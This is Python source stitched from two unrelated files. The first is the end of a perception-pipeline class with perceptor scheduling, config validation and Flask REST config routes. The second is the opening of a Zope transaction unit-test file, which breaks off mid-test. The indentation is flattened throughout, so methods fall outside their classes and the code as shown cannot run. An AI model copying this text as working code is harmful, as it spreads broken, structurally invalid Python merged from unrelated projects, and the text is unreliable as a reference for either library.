        self.__output_config_schema[name].items()
    }
def __run_output_stream(
        self, name: str, input_data: StreamData, pom: PerceptionObjectModel) -> None:
    """
    Runs one output stream for the current pulse: invokes its callback to
    shape the data, writes the result to the stream, and stores the
    stream's output on the POM under the stream's name.

    # Arguments
    name (str): The output stream's name.
    input_data (StreamData): The pulse's raw input data.
    pom (PerceptionObjectModel): The pulse's POM.
    """
    try:
        entry = self.__output_streams[name]
        processed = entry["callback"](pom, input_data)
        pom.set_value(name, entry["stream"].write(processed))
    except Exception as e:
        self.__logger.exception("Error running output stream '%s'", name)
        if self.__output_stream_error_handler_callback is None:
            raise e
        self.__output_stream_error_handler_callback(name, e)
def __run_perceptor(
        self, name: str, input_data: StreamData, pom: PerceptionObjectModel) -> None:
    """
    Runs one perceptor through the processing engine and records its
    execution time (both this pulse's timing and a running average), even
    when the run fails.

    # Arguments
    name (str): The perceptor's name.
    input_data (StreamData): The pulse's raw input data.
    pom (PerceptionObjectModel): The pulse's POM.
    """
    start = time.perf_counter()
    try:
        return self.__processing_engine.run(
            self.__perceptors[name],
            input_data,
            pom,
            self.__perceptor_config_registry[name])
    except Exception as e:
        self.__logger.exception("Error running perceptor '%s'", name)
        if self.__perceptor_error_handler_callback is None:
            raise e
        self.__perceptor_error_handler_callback(name, e)
    finally:
        # Timing bookkeeping runs on success, handled error, and re-raise.
        elapsed = time.perf_counter() - start
        self.__perceptors_execution_time[name] = {
            "execution_time": elapsed,
        }
        previous_avg = self.__average_perceptor_execution.get(name)
        if previous_avg is None:
            self.__average_perceptor_execution[name] = elapsed
        else:
            # Incremental mean over the pulses seen so far.
            self.__average_perceptor_execution[name] = (
                previous_avg * (self.__pulse_number - 1) + elapsed
            ) / self.__pulse_number
def __set_perceptor_result(
        self, perceptor_name: str, pom: PerceptionObjectModel) -> Callable[[Any], None]:
    """
    Builds a completion callback that records a perceptor's result on the POM.

    # Arguments
    perceptor_name (str): The perceptor's name; used as the POM key.
    pom (PerceptionObjectModel): The POM the result is written to.

    # Returns
    Callable[[Any], None]: Callback suitable for `apply_async(callback=...)`.
    """
    def _record(result: Any) -> None:
        # Invoked by the thread pool with the perceptor's return value;
        # perceptor_name and pom are captured from the enclosing call.
        pom.set_value(perceptor_name, result)
    return _record
def __get_perceptors_order(self) -> List[str]:
    """
    Gets the topological order of the perceptors.

    Childless perceptors that are nobody's child ("orphans") are merged
    into the first level so they run with the roots of the DAG.

    # Returns
    [str]: The order of the perceptors, as a list of levels; perceptors
        within a level may run in parallel.
    """
    orphan_perceptors = []   # childless perceptors not seen as anyone's child
    parent_perceptors = []   # (parent, child) edges fed to the toposort
    visited = []             # names already encountered as a child
    # NOTE(review): orphan detection depends on dict iteration order — a
    # childless perceptor is classified before later entries can mark it
    # as their child, so a name could end up both in orphan_perceptors and
    # in the toposort result. TODO confirm insertion order guarantees this
    # cannot happen in practice (parents are added before children).
    for perceptor_name in self.__perceptors:
        child_perceptors = self.__perceptors[perceptor_name].get_child_perceptors(
        )
        if len(child_perceptors) == 0:
            if perceptor_name not in visited:
                orphan_perceptors.append(perceptor_name)
        else:
            visited.append(perceptor_name)
            for child in child_perceptors:
                parent_perceptors.append((perceptor_name, child))
                visited.append(child)
    if len(parent_perceptors) > 0:
        # acyclic_toposort returns a list of sets (levels); fold the
        # orphans into level 0 so they execute first.
        perceptors_order = acyclic_toposort(parent_perceptors)
        _ = [perceptors_order[0].add(x) for x in orphan_perceptors]
    else:
        perceptors_order = [orphan_perceptors]
    return perceptors_order
def __validate_perceptor(self,
                         name: str,
                         perceptor: Perceptor,
                         input_callback:
                         Callable[[StreamData, PerceptionObjectModel], Any] = None,
                         output_callback: Callable[[Any, PerceptionObjectModel], Any] = None,
                         accelerator_idx: Union[int, None] = None,
                         default_config: dict = None) -> None:
    """
    Validates the arguments used to register a perceptor.

    # Arguments
    name (str): The name of the perceptor; must be a valid identifier and
        unique across perceptors and output streams.
    perceptor (Perceptor): The perceptor instance.
    input_callback (Callable[[StreamData, PerceptionObjectModel], Any]): The
        callback function for the input stream. Default is `None`.
    output_callback (Callable[[Any, PerceptionObjectModel], Any]): The
        callback function for the output stream. Default is `None`.
    accelerator_idx (int): The index of the accelerator. Defaults to `None`.
    default_config (dict): The default config. Defaults to `None`.

    # Raises
    Exception: If the pipeline is already running.
    ValueError: If `accelerator_idx` is out of range.
    """
    if self.__running:
        raise Exception("Pipeline is already running")
    validate_not_none(name, "name is required")
    validate_type(name, str, "name must be a string")
    validate(name.isidentifier(), "name must be a valid identifier")
    validate(name not in self.__perceptors, "name must be unique")
    validate(name not in self.__output_streams, "name must be unique")
    validate_not_none(perceptor, "perceptor is required")
    validate_type(
        perceptor,
        Perceptor,
        "perceptor must be an instance of Perceptor")
    # Callbacks are optional; only their callability is checked.
    # (A redundant validate_not_none inside the not-None guard was removed.)
    if input_callback is not None:
        validate(callable(input_callback), "input_callback must be a function")
    if output_callback is not None:
        validate(
            callable(output_callback),
            "output_callback must be a function")
    if accelerator_idx is not None:
        validate_type(
            accelerator_idx,
            int,
            "accelerator_idx must be an integer")
        # BUG FIX: only the upper bound was checked before, so a negative
        # index passed validation despite the error message's contract.
        if accelerator_idx < 0 or accelerator_idx >= self.__num_of_edge_tpus:
            raise ValueError(
                f"accelerator_idx must be >= 0 and < {self.__num_of_edge_tpus}")
    if default_config is not None:
        validate_type(
            default_config,
            dict,
            "default_config must be a dictionary")
def __get_perceptor_parents(self, perceptor_name: str) -> List[str]:
    """
    Finds every perceptor that lists the given perceptor as a child.

    # Arguments
    perceptor_name (str): The perceptor whose parents to find.

    # Returns
    [str]: The names of the parent perceptors (empty list if none).
    """
    return [
        candidate
        for candidate, node in self.__perceptors.items()
        if perceptor_name in node.get_child_perceptors()
    ]
def __create_config_registry_for_perceptor(
        self,
        perceptor_name: str,
        perceptor: Perceptor,
        default_config: dict = None) -> None:
    """
    Builds the config registry and schema index for a newly added perceptor,
    seeds every config with its schema default, then applies any caller-
    supplied defaults through validation.

    # Arguments
    perceptor_name (str): The name of the perceptor.
    perceptor (Perceptor): The perceptor.
    default_config (dict): The default config. Defaults to `None`.
    """
    registry = ConfigRegistry()
    self.__perceptor_config_registry[perceptor_name] = registry
    schema_by_name = {}
    for config_schema in perceptor.get_config_schema():
        validate_type(
            config_schema,
            Config,
            "config_schema must be an instance of Config")
        schema_by_name[config_schema.name] = config_schema
        registry.set_value(config_schema.name, config_schema.default_value)
    self.__perceptor_config_schema[perceptor_name] = schema_by_name
    if default_config is not None:
        for name, value in default_config.items():
            self.__validate_and_set_value_for_perceptor_config(
                perceptor_name, name, value)
def __validate_and_set_value_for_perceptor_config(
        self, perceptor_name: str, config_name: str, value: Any) -> None:
    """
    Validates a perceptor config value against its schema and, if valid,
    stores it in the registry and pushes it to the perceptor node.

    Unknown config names are silently ignored.

    # Arguments
    perceptor_name (str): The name of the perceptor.
    config_name (str): The name of the config.
    value (Any): The value of the config.

    # Raises
    ValueError: If the value fails schema validation.
    """
    config_schema = self.__perceptor_config_schema[perceptor_name].get(config_name)
    if config_schema is None:
        return
    if not config_schema.is_valid(value):
        raise ValueError(f"Invalid value for config '{config_name}'")
    self.__perceptor_config_registry[perceptor_name].set_value(
        config_name, value)
    self.__perceptors[perceptor_name].set_perceptor_config(
        config_name, value)
def __start_api_server(self) -> None:
    """
    Starts the REST API server.

    On first call, creates the Flask app (serving the bundled swagger
    assets), registers the routes, and runs the server (blocking). On
    subsequent calls, only re-registers the routes on the existing app.
    """
    if self.__flask_app is not None:
        self.__setup_paths()
        return
    swagger_root = os.path.join(
        pathlib.Path(__file__).parent.absolute(), "swagger")
    self.__flask_app = Flask(
        __name__,
        static_folder=os.path.join(swagger_root, "static"),
        template_folder=os.path.join(swagger_root, "templates"))
    self.__setup_paths()
    self.__flask_app.run(
        host=self.__host,
        port=self.__port,
        ssl_context=None,
        debug=False)
def __setup_paths(self) -> None:
    """
    Registers the REST API routes on the Flask app, skipping any route
    that is already present (makes the method idempotent).
    """
    routes = {
        "/perceptors": {
            "methods": ["GET"],
            "function": self.__get_perceptors,
        },
        "/outputs": {
            "methods": ["GET"],
            "function": self.__get_outputs,
        },
        "/perceptors/config": {
            "methods": ["GET", "PATCH"],
            "function": self.__modify_perceptors_config_registry,
        },
        "/perceptors/<perceptor>/config": {
            "methods": ["GET", "PATCH"],
            "function": self.__modify_perceptor_config_registry,
        },
        "/outputs/config": {
            "methods": ["GET", "PATCH"],
            "function": self.__modify_outputs_config_registry,
        },
        "/outputs/<output_stream>/config": {
            "methods": ["GET", "PATCH"],
            "function": self.__modify_output_config_registry,
        },
        "/swagger": {
            "methods": ["GET"],
            "function": self.__swagger,
        },
        "/specs": {
            "methods": ["GET"],
            "function": self.__specs,
        },
    }
    for route, route_config in routes.items():
        complete_path = self.__path + route
        already_registered = any(
            rule.rule == complete_path
            for rule in self.__flask_app.url_map.iter_rules())
        if already_registered:
            continue
        # The path doubles as the endpoint name.
        self.__flask_app.add_url_rule(
            complete_path,
            complete_path,
            route_config["function"],
            methods=route_config["methods"])
def __get_perceptors(self) -> Response:
    """
    GET handler: lists the names of all registered perceptors.

    # Returns
    Response: JSON array of perceptor names.
    """
    return jsonify(list(self.__perceptors.keys()))
def __get_outputs(self) -> Response:
    """
    GET handler: lists the names of all registered output streams.

    # Returns
    Response: JSON array of output stream names.
    """
    return jsonify(list(self.__output_streams.keys()))
def __modify_perceptors_config_registry(self) -> Response:
    """
    GET/PATCH handler for all perceptors' configs.

    PATCH expects `{perceptor_name: {config_name: value, ...}, ...}` and
    applies each value through validation; both methods respond with the
    full config listing per perceptor.

    # Returns
    Response: 404 for an unknown perceptor, 400 with the collected errors
        if any value failed validation, otherwise the config listing.
    """
    errors = []
    if request.method == "PATCH":
        body = self.__get_body()
        for perceptor_name, values in body.items():
            if perceptor_name not in self.__perceptors:
                return Response(
                    f"perceptor with name {perceptor_name} does not exist",
                    status=404)
            for name, value in values.items():
                try:
                    self.__validate_and_set_value_for_perceptor_config(
                        perceptor_name, name, value)
                except BaseException:
                    errors.append(f"Invalid value for config '{name}'")
    if errors:
        return jsonify(errors), 400
    cfgs = {
        perceptor_name: [
            {
                "name": config_name,
                "value": self.__perceptor_config_registry[perceptor_name].get(config_name),
                "type": config_schema.type,
                "description": config_schema.description,
                "default_value": config_schema.default_value,
            }
            for config_name, config_schema in
            self.__perceptor_config_schema[perceptor_name].items()
        ]
        for perceptor_name in self.__perceptors
    }
    return jsonify(cfgs)
def __modify_perceptor_config_registry(self, **kwargs) -> Response:
    """
    GET/PATCH handler for one perceptor's config.

    PATCH expects `{config_name: value, ...}` and applies each value
    through validation; both methods respond with the perceptor's full
    config listing.

    # Arguments
    **kwargs: Flask route arguments; `perceptor` holds the perceptor name.

    # Returns
    Response: 404 for an unknown perceptor, 400 with the collected errors
        if any value failed validation, otherwise the config listing.
    """
    perceptor_name = kwargs["perceptor"]
    if perceptor_name not in self.__perceptors:
        return Response(
            f"perceptor with name {perceptor_name} does not exist", status=404)
    errors = []
    if request.method == "PATCH":
        for name, value in self.__get_body().items():
            try:
                self.__validate_and_set_value_for_perceptor_config(
                    perceptor_name, name, value)
            except BaseException:
                errors.append(f"Invalid value for config '{name}'")
    if errors:
        return jsonify(errors), 400
    registry = self.__perceptor_config_registry[perceptor_name]
    cfgs = [
        {
            "name": config_name,
            "value": registry.get(config_name),
            "type": config_schema.type,
            "description": config_schema.description,
            "default_value": config_schema.default_value,
        }
        for config_name, config_schema in
        self.__perceptor_config_schema[perceptor_name].items()
    ]
    return jsonify(cfgs)
def __modify_outputs_config_registry(self) -> Response:
    """
    GET/PATCH handler for all output streams' configs.

    PATCH expects `{output_name: {config_name: value, ...}, ...}` and
    applies each value through validation; both methods respond with the
    full config listing per output stream.

    # Returns
    Response: 404 for an unknown output stream, 400 with the collected
        errors if any value failed validation, otherwise the config listing.
    """
    errors = []
    if request.method == "PATCH":
        body = self.__get_body()
        for output_name, values in body.items():
            if output_name not in self.__output_streams:
                return Response(
                    f"output stream with name {output_name} does not exist", status=404)
            for name, value in values.items():
                try:
                    self.__validate_and_set_value_for_output_stream_config(
                        output_name, name, value)
                except BaseException:
                    errors.append(f"Invalid value for config '{name}'")
    if errors:
        return jsonify(errors), 400
    cfgs = {
        output_name: [
            {
                "name": config_name,
                "value": self.__output_config_registry[output_name].get(config_name),
                "type": config_schema.type,
                "description": config_schema.description,
                "default_value": config_schema.default_value,
            }
            for config_name, config_schema in
            self.__output_config_schema[output_name].items()
        ]
        for output_name in self.__output_streams
    }
    return jsonify(cfgs)
def __modify_output_config_registry(self, **kwargs) -> Response:
    """
    GET/PATCH handler for one output stream's config.

    PATCH expects `{config_name: value, ...}` and applies each value
    through validation; both methods respond with the stream's full
    config listing.

    # Arguments
    **kwargs: Flask route arguments; `output_stream` holds the stream name.

    # Returns
    Response: 404 for an unknown output stream, 400 with the collected
        errors if any value failed validation, otherwise the config listing.
    """
    output_name = kwargs["output_stream"]
    if output_name not in self.__output_streams:
        return Response(
            f"output stream with name {output_name} does not exist", status=404)
    errors = []
    if request.method == "PATCH":
        for name, value in self.__get_body().items():
            try:
                self.__validate_and_set_value_for_output_stream_config(
                    output_name, name, value)
            except BaseException:
                errors.append(f"Invalid value for config '{name}'")
    if errors:
        return jsonify(errors), 400
    registry = self.__output_config_registry[output_name]
    cfgs = [
        {
            "name": config_name,
            "value": registry.get(config_name),
            "type": config_schema.type,
            "description": config_schema.description,
            "default_value": config_schema.default_value,
        }
        for config_name, config_schema in
        self.__output_config_schema[output_name].items()
    ]
    return jsonify(cfgs)
def __create_config_registry_for_output_stream(
        self,
        name: str,
        output_stream: OutputStream,
        default_config: dict = None) -> None:
    """
    Builds the config registry and schema index for a newly added output
    stream, seeds every config with its schema default, then applies any
    caller-supplied defaults through validation.

    # Arguments
    name: The name of the output stream.
    output_stream: The output stream.
    default_config: The default config. Defaults to `None`.
    """
    registry = ConfigRegistry()
    self.__output_config_registry[name] = registry
    schema_by_name = {}
    for config_schema in output_stream.get_config_schema():
        validate_type(
            config_schema,
            Config,
            "config_schema must be an instance of Config")
        schema_by_name[config_schema.name] = config_schema
        registry.set_value(config_schema.name, config_schema.default_value)
    self.__output_config_schema[name] = schema_by_name
    if default_config is not None:
        for config_name, value in default_config.items():
            self.__validate_and_set_value_for_output_stream_config(
                name, config_name, value)
def __validate_and_set_value_for_output_stream_config(
        self, name: str, config_name: str, value: Any) -> None:
    """
    Validates an output stream config value against its schema and, if
    valid, stores it in the registry and pushes it to the stream.

    Unknown config names are silently ignored.

    # Arguments
    name: The name of the output stream.
    config_name: The name of the config.
    value: The value.

    # Raises
    ValueError: If the value fails schema validation.
    """
    config_schema = self.__output_config_schema[name].get(config_name)
    if config_schema is None:
        return
    if not config_schema.is_valid(value):
        raise ValueError(f"Invalid value for config '{config_name}'")
    self.__output_config_registry[name].set_value(config_name, value)
    self.__output_streams[name]["stream"].set_config_value(
        config_name, value)
def __get_body(self):
    """
    Gets the request body as a dict.

    A string body is parsed as JSON; anything else must already be a
    JSON object (dict).

    # Returns
        dict: The body.
    """
    body = request.json
    if isinstance(body, str):
        # Some clients send the JSON document as a quoted string.
        return json.loads(body)
    validate_type(body, dict, "request body must be a JSON")
    return body
def __swagger(self) -> Response:
    """
    Serves the Swagger UI page.

    # Returns
        Response: The rendered `swaggerui.html` template, parameterized
        with this server's base path.
    """
    return render_template("swaggerui.html", base_path=self.__path)
def __specs(self) -> Response:
    """
    Serves the OpenAPI 2.0 specs document.

    # Returns
        Response: The rendered `openapi.json` template, parameterized
        with this server's base path.
    """
    return render_template("openapi.json", base_path=self.__path)
def __set_perception_completion_callback(
        self, perception_completion_callback: Callable[[PerceptionObjectModel], None] = None):
    """
    Sets the perception completion callback.

    The callable is validated only when a non-None value is given.
    NOTE(review): source indentation was ambiguous here — this reading
    always assigns (so passing None clears the callback); confirm
    against the original file.

    # Arguments
        perception_completion_callback: Called with the resulting
            `PerceptionObjectModel` when perception completes.
    """
    if perception_completion_callback is not None:
        validate(callable(perception_completion_callback),
                 "perception_completion_callback must be a function")
    self.__perception_completion_callback = perception_completion_callback
|
test__transaction.py | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2001, 2002, 2005 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Test transaction behavior for variety of cases.
I wrote these unittests to investigate some odd transaction
behavior when doing unittests of integrating non-subtransaction-
aware objects, and to ensure proper txn behavior. These
tests exercise the transaction system independently of the rest of
the ZODB.
you can see the method calls to a jar by passing the
keyword arg tracing to the modify method of a dataobject.
the value of the arg is a prefix used for tracing print calls
to that objects jar.
the number of times a jar method was called can be inspected
by looking at an attribute of the jar that is the method
name prefixed with a c (count/check).
I've included some tracing examples for tests that I thought
were illuminating, as doc strings below.
TODO
add in tests for objects which are modified multiple times,
for example an object that gets modified in multiple sub txns.
"""
import os
import warnings
import unittest
class TransactionTests(unittest.TestCase):
def _getTargetClass(self):
    """Return the class under test (imported lazily)."""
    from transaction._transaction import Transaction
    return Transaction
def _makeOne(self, synchronizers=None, manager=None):
    """Construct a Transaction with the given synchronizers/manager."""
    return self._getTargetClass()(synchronizers, manager)
def test_verifyImplements_ITransaction(self):
    """The Transaction class declares the ITransaction interface."""
    from zope.interface.verify import verifyClass
    from transaction.interfaces import ITransaction
    verifyClass(ITransaction, self._getTargetClass())
def test_verifyProvides_ITransaction(self):
    """A Transaction instance provides the ITransaction interface."""
    from zope.interface.verify import verifyObject
    from transaction.interfaces import ITransaction
    verifyObject(ITransaction, self._makeOne())
def test_ctor_defaults(self):
    """A fresh transaction has empty/default state and logs 'new transaction'."""
    from transaction.weakset import WeakSet
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    logger = DummyLogger()
    # Monkey swaps the module-level logger so its output can be inspected.
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        self.assertTrue(isinstance(txn._synchronizers, WeakSet))
        self.assertEqual(len(txn._synchronizers), 0)
        self.assertTrue(txn._manager is None)
        self.assertEqual(txn.user, u"")
        self.assertEqual(txn.description, u"")
        self.assertTrue(txn._savepoint2index is None)
        self.assertEqual(txn._savepoint_index, 0)
        self.assertEqual(txn._resources, [])
        self.assertEqual(txn._adapters, {})
        self.assertEqual(txn._voted, {})
        self.assertEqual(txn.extension, {})
        self.assertTrue(txn._extension is txn.extension)  # legacy
        self.assertTrue(txn.log is logger)
        # Construction itself produces exactly one debug log entry.
        self.assertEqual(len(logger._log), 1)
        self.assertEqual(logger._log[0][0], 'debug')
        self.assertEqual(logger._log[0][1], 'new transaction')
        self.assertTrue(txn._failure_traceback is None)
        self.assertEqual(txn._before_commit, [])
        self.assertEqual(txn._after_commit, [])
def test_ctor_w_syncs(self):
    """A synchronizer WeakSet passed to the constructor is stored as-is."""
    from transaction.weakset import WeakSet
    synchronizers = WeakSet()
    transaction = self._makeOne(synchronizers=synchronizers)
    self.assertIs(transaction._synchronizers, synchronizers)
def test_isDoomed(self):
    """isDoomed is False for a fresh transaction and True once DOOMED."""
    from transaction._transaction import Status
    transaction = self._makeOne()
    # A brand-new transaction is not doomed.
    self.assertFalse(transaction.isDoomed())
    # Force the DOOMED status and re-check.
    transaction.status = Status.DOOMED
    self.assertTrue(transaction.isDoomed())
def test_doom_active(self):
    """doom() on an ACTIVE transaction marks it DOOMED."""
    from transaction._transaction import Status
    transaction = self._makeOne()
    transaction.doom()
    self.assertEqual(transaction.status, Status.DOOMED)
    self.assertTrue(transaction.isDoomed())
def test_doom_invalid(self):
    """doom() raises ValueError in any committing/committed state."""
    from transaction._transaction import Status
    txn = self._makeOne()
    for status in Status.COMMITTING, Status.COMMITTED, Status.COMMITFAILED:
        txn.status = status
        self.assertRaises(ValueError, txn.doom)
def test_doom_already_doomed(self):
    """doom() on an already-DOOMED transaction is a no-op, not an error."""
    from transaction._transaction import Status
    txn = self._makeOne()
    txn.status = Status.DOOMED
    txn.doom()
    self.assertTrue(txn.isDoomed())
    self.assertEqual(txn.status, Status.DOOMED)
def test__prior_operation_failed(self):
    """_prior_operation_failed raises TransactionFailedError embedding the saved traceback."""
    from transaction.interfaces import TransactionFailedError
    from transaction.tests.common import assertRaisesEx
    class _Traceback(object):
        def getvalue(self):
            return 'TRACEBACK'
    txn = self._makeOne()
    txn._failure_traceback = _Traceback()
    err = assertRaisesEx(TransactionFailedError,
                         txn._prior_operation_failed)
    self.assertTrue(str(err).startswith('An operation previously failed'))
    self.assertTrue(str(err).endswith("with traceback:\n\nTRACEBACK"))
def test_join_COMMITFAILED(self):
    """join() after a failed commit raises TransactionFailedError."""
    from transaction.interfaces import TransactionFailedError
    from transaction._transaction import Status
    class _Traceback(object):
        def getvalue(self):
            return 'TRACEBACK'
    txn = self._makeOne()
    txn.status = Status.COMMITFAILED
    txn._failure_traceback = _Traceback()
    self.assertRaises(TransactionFailedError, txn.join, object())
def test_join_COMMITTING(self):
    """join() refuses new resources while the transaction is COMMITTING."""
    from transaction._transaction import Status
    transaction = self._makeOne()
    transaction.status = Status.COMMITTING
    with self.assertRaises(ValueError):
        transaction.join(object())
def test_join_COMMITTED(self):
    """join() refuses new resources once the transaction is COMMITTED."""
    from transaction._transaction import Status
    transaction = self._makeOne()
    transaction.status = Status.COMMITTED
    with self.assertRaises(ValueError):
        transaction.join(object())
def test_join_DOOMED_non_preparing_wo_sp2index(self):
    """A doomed transaction still accepts joins; resource is appended directly."""
    from transaction._transaction import Status
    txn = self._makeOne()
    txn.status = Status.DOOMED
    resource = object()
    txn.join(resource)
    self.assertEqual(txn._resources, [resource])
def test_join_ACTIVE_w_preparing_w_sp2index(self):
    """Joining a 'preparing' (pre-savepoint-API) data manager while
    savepoints exist wraps it in a DataManagerAdapter and registers an
    AbortSavepoint with every outstanding savepoint."""
    from transaction._transaction import AbortSavepoint
    from transaction._transaction import DataManagerAdapter
    class _TSP(object):
        def __init__(self):
            self._savepoints = []
    class _DM(object):
        def prepare(self):
            pass
    txn = self._makeOne()
    tsp = _TSP()
    txn._savepoint2index = {tsp: object()}
    # BUG FIX: join an *instance* of the data manager, not the class
    # object itself (the original `dm = _DM` only worked by accident of
    # the hasattr-based 'prepare' check).
    dm = _DM()
    txn.join(dm)
    self.assertEqual(len(txn._resources), 1)
    dma = txn._resources[0]
    self.assertTrue(isinstance(dma, DataManagerAdapter))
    self.assertTrue(txn._resources[0]._datamanager is dm)
    self.assertEqual(len(tsp._savepoints), 1)
    self.assertTrue(isinstance(tsp._savepoints[0], AbortSavepoint))
    self.assertTrue(tsp._savepoints[0].datamanager is dma)
    self.assertTrue(tsp._savepoints[0].transaction is txn)
def test__unjoin_miss(self):
    """_unjoin of a never-joined resource is a silent no-op."""
    transaction = self._makeOne()
    transaction._unjoin(object())  # must not raise
def test__unjoin_hit(self):
    """_unjoin removes a previously joined resource."""
    transaction = self._makeOne()
    joined = object()
    transaction._resources.append(joined)
    transaction._unjoin(joined)
    self.assertEqual(len(transaction._resources), 0)
def test_savepoint_COMMITFAILED(self):
    """savepoint() after a failed commit raises TransactionFailedError."""
    from transaction.interfaces import TransactionFailedError
    from transaction._transaction import Status
    class _Traceback(object):
        def getvalue(self):
            return 'TRACEBACK'
    txn = self._makeOne()
    txn.status = Status.COMMITFAILED
    txn._failure_traceback = _Traceback()
    self.assertRaises(TransactionFailedError, txn.savepoint)
def test_savepoint_empty(self):
    """A savepoint on an empty transaction is indexed and has no sub-savepoints."""
    from weakref import WeakKeyDictionary
    from transaction import _transaction
    from transaction._transaction import Savepoint
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        sp = txn.savepoint()
        self.assertTrue(isinstance(sp, Savepoint))
        self.assertTrue(sp.transaction is txn)
        self.assertEqual(sp._savepoints, [])
        # The savepoint counter advances and the mapping is created lazily.
        self.assertEqual(txn._savepoint_index, 1)
        self.assertTrue(isinstance(txn._savepoint2index, WeakKeyDictionary))
        self.assertEqual(txn._savepoint2index[sp], 1)
def test_savepoint_non_optimistc_resource_wo_support(self):
    """A resource with no savepoint support fails the transaction on savepoint().

    NOTE(review): 'optimistc' in the method name is a typo for
    'optimistic'; left unchanged to preserve the test id.
    """
    from transaction import _transaction
    from transaction._transaction import Status
    from transaction._compat import StringIO
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        logger._clear()
        resource = object()
        txn._resources.append(resource)
        self.assertRaises(TypeError, txn.savepoint)
        # Failure dooms the transaction and records the traceback.
        self.assertEqual(txn.status, Status.COMMITFAILED)
        self.assertTrue(isinstance(txn._failure_traceback, StringIO))
        self.assertTrue('TypeError' in txn._failure_traceback.getvalue())
        # The cleanup path logs two errors (abort, then tpc_abort).
        self.assertEqual(len(logger._log), 2)
        self.assertEqual(logger._log[0][0], 'error')
        self.assertTrue(logger._log[0][1].startswith('Error in abort'))
        self.assertEqual(logger._log[1][0], 'error')
        self.assertTrue(logger._log[1][1].startswith('Error in tpc_abort'))
def test__remove_and_invalidate_after_miss(self):
    """_remove_and_invalidate_after with an unknown savepoint raises KeyError, leaving the map intact."""
    from weakref import WeakKeyDictionary
    txn = self._makeOne()
    txn._savepoint2index = WeakKeyDictionary()
    class _SP(object):
        def __init__(self, txn):
            self.transaction = txn
    holdme = []
    for i in range(10):
        sp = _SP(txn)
        holdme.append(sp)  # prevent gc
        txn._savepoint2index[sp] = i
    self.assertEqual(len(txn._savepoint2index), 10)
    self.assertRaises(KeyError, txn._remove_and_invalidate_after, _SP(txn))
    self.assertEqual(len(txn._savepoint2index), 10)
def test__remove_and_invalidate_after_hit(self):
    """_remove_and_invalidate_after drops the given savepoint and all later ones."""
    from weakref import WeakKeyDictionary
    txn = self._makeOne()
    txn._savepoint2index = WeakKeyDictionary()
    class _SP(object):
        def __init__(self, txn, index):
            self.transaction = txn
            self._index = index
        def __lt__(self, other):
            return self._index < other._index
        def __repr__(self):
            return '_SP: %d' % self._index
    holdme = []
    for i in range(10):
        sp = _SP(txn, i)
        holdme.append(sp)  # prevent gc
        txn._savepoint2index[sp] = i
    self.assertEqual(len(txn._savepoint2index), 10)
    # Removing savepoint 1 invalidates indexes 1..9; only 0 and 1's
    # predecessors remain mapped.
    txn._remove_and_invalidate_after(holdme[1])
    self.assertEqual(sorted(txn._savepoint2index), sorted(holdme[:2]))
def test__invalidate_all_savepoints(self):
    """_invalidate_all_savepoints empties the savepoint index map."""
    from weakref import WeakKeyDictionary
    txn = self._makeOne()
    txn._savepoint2index = WeakKeyDictionary()
    class _SP(object):
        def __init__(self, txn, index):
            self.transaction = txn
            self._index = index
        def __repr__(self):
            return '_SP: %d' % self._index
    holdme = []
    for i in range(10):
        sp = _SP(txn, i)
        holdme.append(sp)  # prevent gc
        txn._savepoint2index[sp] = i
    self.assertEqual(len(txn._savepoint2index), 10)
    txn._invalidate_all_savepoints()
    self.assertEqual(list(txn._savepoint2index), [])
def test_register_wo_jar(self):
    """register() requires the object to have a _p_jar."""
    class _Dummy(object):
        _p_jar = None
    txn = self._makeOne()
    self.assertRaises(ValueError, txn.register, _Dummy())
def test_register_w_jar(self):
    """register() creates one adapter per jar and tracks the object in it."""
    class _Manager(object):
        pass
    mgr = _Manager()
    class _Dummy(object):
        _p_jar = mgr
    txn = self._makeOne()
    dummy = _Dummy()
    txn.register(dummy)
    resources = list(txn._resources)
    self.assertEqual(len(resources), 1)
    adapter = resources[0]
    self.assertTrue(adapter.manager is mgr)
    self.assertTrue(dummy in adapter.objects)
    # The adapter is memoized per jar in txn._adapters.
    items = list(txn._adapters.items())
    self.assertEqual(len(items), 1)
    self.assertTrue(items[0][0] is mgr)
    self.assertTrue(items[0][1] is adapter)
def test_register_w_jar_already_adapted(self):
    """register() reuses an existing adapter for the same jar."""
    class _Adapter(object):
        def __init__(self):
            self.objects = []
    class _Manager(object):
        pass
    mgr = _Manager()
    class _Dummy(object):
        _p_jar = mgr
    txn = self._makeOne()
    txn._adapters[mgr] = adapter = _Adapter()
    dummy = _Dummy()
    txn.register(dummy)
    self.assertTrue(dummy in adapter.objects)
def test_commit_DOOMED(self):
    """Committing a doomed transaction raises DoomedTransaction."""
    from transaction._transaction import Status
    from transaction.interfaces import DoomedTransaction
    transaction = self._makeOne()
    transaction.status = Status.DOOMED
    with self.assertRaises(DoomedTransaction):
        transaction.commit()
def test_commit_COMMITFAILED(self):
    """commit() after a failed commit raises TransactionFailedError."""
    from transaction._transaction import Status
    from transaction.interfaces import TransactionFailedError
    class _Traceback(object):
        def getvalue(self):
            return 'TRACEBACK'
    txn = self._makeOne()
    txn.status = Status.COMMITFAILED
    txn._failure_traceback = _Traceback()
    self.assertRaises(TransactionFailedError, txn.commit)
def test_commit_wo_savepoints_wo_hooks_wo_synchronizers(self):
    """A bare commit reaches COMMITTED, frees the manager, and logs 'commit'."""
    from transaction._transaction import Status
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    class _Mgr(object):
        def __init__(self, txn):
            self._txn = txn
        def free(self, txn):
            assert txn is self._txn
            self._txn = None
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
